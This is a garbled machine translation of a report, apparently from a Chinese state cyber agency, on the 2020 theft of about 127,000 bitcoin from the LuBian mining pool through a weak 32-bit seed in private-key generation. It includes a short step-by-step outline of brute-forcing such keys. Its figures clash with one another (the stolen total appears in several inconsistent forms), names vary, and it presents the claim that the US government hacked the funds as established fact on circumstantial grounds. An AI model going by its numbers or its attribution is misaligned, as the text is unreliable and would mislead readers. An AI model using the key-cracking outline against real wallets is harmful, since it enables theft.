LuBian, we've got a technical back-up analysis of a huge bitcoin incident that was hacked into the mine

Author:National Computer Virus Emergency Response Centre

 

On 29 December 2020, a major hacker attack took place in the LuBian mine, in which a total of 127272.0693,536 bitcoin (which was valued at around $3.5 billion at the time and has now reached $15 billion) was stolen by the attackers. It is the chairman of the Cambodian Princes Group who is holding the large bitcoin。

After the hacker attack, Chen Zhi and his Crown Princes Group published information on the block chain in early 2021 and July 2022, respectively, shouting at hackers in the hope that they would return stolen bitcoin and be willing to pay the ransom, but received no response。

It is strange, however, that the large amount of bitcoin that has been stolen, which has been in the hands of the attackers for four years, and has remained almost intact, is clearly inconsistent with the desire of ordinary hackers to pursue interests, more like an accurate operation run by a “national hacking organization”. It was not until June 2024 that the stolen bitcoin was again transferred to the address of the new bitcoin wallet, which remains intact。

On 14 October 2025, the United States Department of Justice announced criminal charges against Chen Zhi, claiming the confiscation of 127,000 bitcoin from Chen Zhi and his Crown Princes Group. The evidence suggests that the United States Government seized Chen Jing and his Crown Prince's group. It was the bitcoin of the LuBian mine that had been stolen by hackers as early as 2020. In other words, the United States Government, or as long ago as 2020, had stolen 127,000 bitcoins held by Chen through hacking technology, a typical “black-and-black” event in the hands of national hacker organizations。

From a technical point of view, the report analyses in depth the key technical details of the incident, focusing on the history of the stolen Bitcoin, returning the full time line of the attack at that time, assessing the security mechanisms of Bitcoin and hoping to provide valuable security insight to the encrypted money industry and users。

I. BACKGROUND OF THE EVENT

LuBian Mining Pool was established in early 2020 as a fast-growing Bitcoin mine with China and Iran as its main operating bases. In December 2020, the LuBian mine pond was subjected to a large-scale hacker attack that resulted in the theft of more than 90 per cent of its Bitcoin holdings. The total amount stolen was 127272.06953176 BTC, which largely coincides with the statement of 127271 BTC in the United States Department of Justice indictment。

The operating model of the LuBian mine pool includes centralized storage and distribution of incentives for mining. Bitcoin is not stored in a regulated centralized exchange at the mine address, but in a non-trust wallet. At the technical level, non-trust wallets (also known as cold wallets or hardware wallets) are considered to be the ultimate safe haven for encrypted assets, unlike exchange accounts that can be frozen by a paper decree, more like a bank vault belonging only to the holder ' s own, with the key (private key) in the possession of the holder。

Bitcoin is a encrypted currency whose chain address is used to identify the attribution and movement of the Bitcoin assets, and where the private key to the chain of address is fully controlled by bitcoin at the address on the Bitcoin chain. According to the chain analysis agency, the huge amount of bitcoin controlled by the United States Government coincided with the hacking of the LuBian mine。

The chain data records show that, on 29 December 2020 Beijing time, LuBian ' s core bitco wallet address was abnormally transferred to a total of 127272.06953176 BTC, largely in line with the statement of 127271 BTC in the indictment of the United States Department of Justice. The stolen bitcoin remained silent until June 2024, following its unusual transfer。

THE STOLEN BITCOIN WAS AGAIN TRANSFERRED TO THE NEW CHAIN ADDRESS BETWEEN 22 JUNE AND 23 JULY 2024, BEIJING, AND REMAINS INTACT. ARKHAM, A WELL-KNOWN UNITED STATES BLOCK CHAIN TRACKING TOOL PLATFORM, HAS MARKED THESE FINAL ADDRESSES AS BEING HELD BY THE UNITED STATES GOVERNMENT. AT PRESENT, THE GOVERNMENT OF THE UNITED STATES HAS NOT MADE PUBLIC IN ITS INDICTMENT HOW TO OBTAIN PRIVATE KEYS TO THE VERY LARGE BITCOIN CHAIN。

Figure 1: Key Activity Timelines

II. Analysis of the attack chain

It is well known that in a world of block chains, random numbers are the cornerstone of encryption security. Bitcoin uses asymmetric encryption, and bitcoin private keys are a set of 256-digit binary random numbers with a theoretical breakdown of 2256 times, almost impossible. But if this set of 256-digit binary private keys is not entirely randomly generated, for example, 224 of them have a rule that can be extrapolated, and only 32 of them are randomly generated, it will significantly reduce the strength of the private key, and only 232 (about 4.29 billion) times can be broken violently. For example, in September 2022, Wintermute, a United Kingdom encrypted currency marketer, stole $160 million for a pseudo-random loophole。

In August 2023, the Offshore Security Research Team, MilkSad, first published the discovery of a false random number generator (PRNG) loophole in a third-party key generation tool and successfully applied for CVE number (CVE-2023-39910). The findings of the study published by the team referred to similar loopholes in the LuBian Bitcoin mine, which included all 25 bitcoin addresses in the United States Department of Justice indictment, in the address of the LuBian Bitcoin mine that had been hacked。

Figure 2: Indictments by the United States Department of JusticeList of 25 bitcoin wallets

The LuBianbitcomine mine, as a non-hosting wallet system, relies on a self-defined private key generation algorithm to manage the funds, and private key generation, instead of the recommended 256-digit random number, relies on a 32-digit binary random number, which is fatally flawed: the “simplified random generator” (MT 19937-32) that relies only on time stamping or weak input as a seed, and a pseudo-random generator (PRNG) is equivalent to the randomity of a four-word whole number, which can be efficiently depleted in modern calculations. Mathically, the probability of cracking is 1/232, for example, assuming that 106 keys are tested per second for attack scripts, the time of cracking is approximately 4,200 seconds (about 1.17 hours only). In practice, optimization tools such as Hashcat or custom scripts can further accelerate. The attackers used this loophole to steal a huge bitcoin from the LuBian bitcoin pond。

Figure 3: Comparison of deficiencies in LuBian ponds with industry safety standards

The complete time line and details of the hacking of the LuBian mine ponds after technical traceability are as follows:

1. The assault theft phase: Beijing time 29 December 2020

Events: The use by hackers of a pseudo-random loophole created by the private key of the Bitcoin wallet address of the LuBian mine to break violently the address of more than 5,000 weak random wallets (barrel type: P2WPKH-ned-in-P2SH, prefix 3). Within approximately two hours, approximately 127272.06953176 BTC (then worth approximately $3.5 billion) was drained from these wallet addresses, leaving less than 200 BTC. All suspicious transactions share the same transaction costs, indicating that the attack was carried out by automated bulk transfer scripts。

Sender: the weak random bitcoin wallet address group of the LuBian mine pool (controlled by the operating entity of the LuBian mine and affiliated with Chen Zhi's Prince Group)

Receiver: Bitcoin wallet address group controlled by the assailant (unpublished address)

(a) Transfer path: weak wallet address group

LINKAGE ANALYSIS: THE TOTAL AMOUNT STOLEN IS 127272.06953176 BTC, BROADLY CONSISTENT WITH THE CLAIM OF 127271 BTC IN THE US DEPARTMENT OF JUSTICE INDICTMENT。

2. Hibernation period: Beijing time 30 December 2020 to 22 June 2024

Incident: After having been stolen through a pseudo-random loophole in 2020, the Bitcoin wallet was kept in the hands of the attackers for four years and was dormant, with less than one in 10,000 dust deals likely to be used for testing。

Linkage analysis: The amount of bitcoin remained almost intact until 22 June 2024, when it was fully taken over by the United States government, which is clearly not in keeping with the general hacker’s eagerness to pursue interests, more like the precision of a national hacking operation。

3. Recovery attempt phase: Beijing time, early 2021, 4-26 July 2022

Incident: After the theft of Bitcoin, during the hibernation period, in early 2021, the LuBian mine sent more than 1,500 messages via the Bitcoin OP_RETURN function (which cost approximately 1.4 BTC fees), embedded in block chain data areas and implored hackers to return funds. Message Example: “Please return our funds, we'll pay a response”. On July 4, 26, 2022, the LuBian mine again sent a message via Bitcoin OP_RETURN, for example: “MSG from LB. the whitehat who is saving our ass, you can contact us through 1228btc@gmail.com to discuss the return of ast and your response.”

Sender: Lubian ' s weak, random bitcoin wallet address (controlled by the operating entity of the Lubian mine, under the Prince Group of Chen Zhi)

Receiver: Bitcoin wallet address group controlled by the assailant

TRANSFER PATH: WEAK WALLET ADDRESS GROUP → STRIKER WALLET ADDRESS GROUP; SMALL TRANSACTIONS EMBEDDED IN OP_RETURN)

Linkage analysis: Following the theft, the information confirmed that the LuBian mine, as the sender, had repeatedly attempted to contact “third-party hackers” to request the return of assets and to negotiate for ransom。

4. Activation and transfer phase: Beijing time 22 June to 23 July 2024

INCIDENT: BITCOIN ACTIVATED FROM HIBERNATION TO EVENTUALLY BITCOIN WALLET ADDRESS IN THE POOL CONTROLLED BY THE ASSAILANT. THE FINAL WALLET ADDRESS WAS MARKED BY THE U.S. GOVERNMENT AS ARKHAM, A WELL-KNOWN BLOCK CHAIN TRACKING TOOL PLATFORM。

Sender: Bitcoin wallet address group controlled by the assailant

Receiver: new integration final wallet address group (unpublished but confirmed as United States Government controlled wallet address group)

The route of transfer: the user-controlled Bitcoin wallet address group

Linkage analysis: This batch of stolen bitcoin was finally controlled by the United States Government after four years of silence, with almost nothing moving。

Public Notice Seizure Phase: US Local Time, 14 October 2025

Incident: The United States Department of Justice issued a communiqué announcing charges against Chen Zhi and “confiscating” 127,000 bitcoin in its possession。

At the same time, through the block chain disclosure mechanism, all bitcoin transactions are made public and traceable. Accordingly, the present report traces the large amount of bitcoin stolen from LuBian's weak random bitcoin wallet address (which is controlled by the operating entity of the LuBian mine and may belong to Chen Zhiqing's Princely Group), the total number of bitcoin stolen being 127,270,063,536, including about 178,000 independent “mining”, approximately 0.23 million wage earnings from the mine ponds and 1,071,000 from the exchange and other sources, all of which, according to the preliminary results, are at variance with the illegal revenues alleged in the United States Department of Justice's indictment。

Analysis of technical details of gaps

1. Private key generation of a bitcoin wallet address:

The core of the hole in the LuBian mine is that its private key generator uses a “MilkSad” defect similar to that found in Libbitcoin Express. Specifically, the system uses the Mesenne Twister (MT 19937-32) pseudo-random generator, which is initialized with 32 seeds, resulting in only 32 bits of active entropy. This PRNG is not encrypted (non-cryptographic) and is easy to predict and reverse. The assailant can generate the corresponding private key by enumerating all possible 32 seeds (0 to 2^32-1) and check whether the public key Hashi matches the known wallet address。

IN THE BITCOIN ECOLOGY, THE PRIVATE KEY GENERATION PROCESS IS USUALLY: RANDOM SEEDS SHA-256 HS EDSSA PRIVATE KEY。

The implementation of the LuBian mine pool base may be based on a custom code or open source bank (e.g. Libbitcoin) but ignores the safety of entropy. Similar to the MilkSad loophole, the Libbitcoin Explorer's “bx seed” order similarly uses MT 19937-32 random numbers generator, relying only on time stamp or weak input as seed, leading to violent breaking of the private key. In the LuBian attack, more than 5,000 wallets were affected, indicating that the loophole was systematic and could originate from the re-use of the code when the wallet was generated in bulk。

2. Simulation of attack processes:

(1) Identification of the target wallet address (monitoring of LuBian mine pool activity through chain)

(2) 32 seeds: for seed in 0 to 4294967295

(3) Generating a private key: Private_key = SHA256 (seed)

(4) Generated public key and address: calculated using the ECDSA SECP 256k1 curve

(5) Match: If the derivative address matches the target, the transaction is made using a private key signature to steal the money

Compared to a similar loophole: it resembles the 32 entropy defects of Trust Wallet, which led to the destruction of a large-scale Bitcoin wallet address; and the “MilkSad” gap of Libbitcoin Explorer, which exposed its private key due to low entropy. These cases stem from the legacy of the early code repository and do not follow the BIP-39 standard (12-24 word seed phrases, providing high entropy). The LuBian pond may have used a self-defined algorithm designed to simplify management while ignoring safety。

Defensive deficiencies: the lack of multiple signatures (multisig), hardware wallets or layers of determinative wallets (HD Wallets) in the LuBian mine can enhance security. The chain data show that the attack covered multiple wallets, indicating a systemic loophole rather than a single point。

3. Evidence and restoration attempts on the chain:

OP_RETURN message: LuBian mine sent more than 1,500 messages via OP_RETURN in Bitcoin, costing 1.4 Bitcoin and begging the attackers to return their funds. These messages are embedded in the block chain and prove to be genuine owner acts, not forgery. Examples include “requests for the return of funds” or similar pleas, distributed in multiple transactions。

4. Analysis of the relationship of the attack:

The Department of Justice of the United States, in its indictment against Chen Zhi (case No. 1:25-cr-00416) dated 14 October 2025, listed 25 bitcoin wallet addresses with approximately 127,271 BTCs, with a total value of approximately $15 billion, which have been seized. These addresses are highly relevant to the attack on the LuBian mine pond through block chain analysis and official document review:

Direct correlation: Analysis of the block chain shows that 25 addresses in the United States Department of Justice indictment were the final possession of bitcoin stolen in the 2020 attack on the LuBian mine. Elliptic reports that the Bitcoin was “stoked” from the mining operations of the LuBian mine in 2020. Arkham Intelligence confirmed that funds seized by the United States Department of Justice were directly attributable to the theft of the LuBian mine。

Indictment evidence linked: The United States Department of Justice indictment does not directly name “LuBian jack”, but refers to the fact that the funds originated from “the stolen attack on mining operations in Bitcoin between Iran and China”, which is consistent with the chain analysis of Eliptic and Arkham Industries。

The attack was linked to the fact that, in terms of the method of attack, after four years of hibernation following the technical attack on the LuBian mine in 2020, less than one-tenth of the dust was traded until 2024, when it was taken over in full by the United States government, which was not in keeping with the general hacker's eagerness to pursue the interests, more like the precision of a national hacking operation, which was analysed as having been controlled by the United States Government or by December 2020。

IV. IMPACT AND RECOMMENDATIONS

The impact of the hacking of the LuBian mine in 2020 led to the actual dismantling of the mine, with losses equal to more than 90 per cent of the total assets at that time, while the present value of stolen bitcoin had risen to $15 billion, highlighting the risk of increased price volatility。

The LuBian mine pond incident exposed systemic risks generated by random numbers in the chain of encrypted monetary instruments. In order to guard against similar loopholes, the block chain industry should use encrypted security random number generators (CSPRNG); implement multiple layers of defence, including multiple signatures (multitrisig), cold storage and periodic audits, to avoid self-defined private key generation algorithms; and integrate the mine ponds into a real-time chain monitoring and abnormal transfer alert system. In terms of protection, ordinary users should avoid using uncertified key generation modules in open-source communities. The incident also reminds us of the catastrophic consequences of a weak security base even when the chain of blocks is highly transparent. It also reflects the importance of cybersecurity in future digital economy, digital currency development。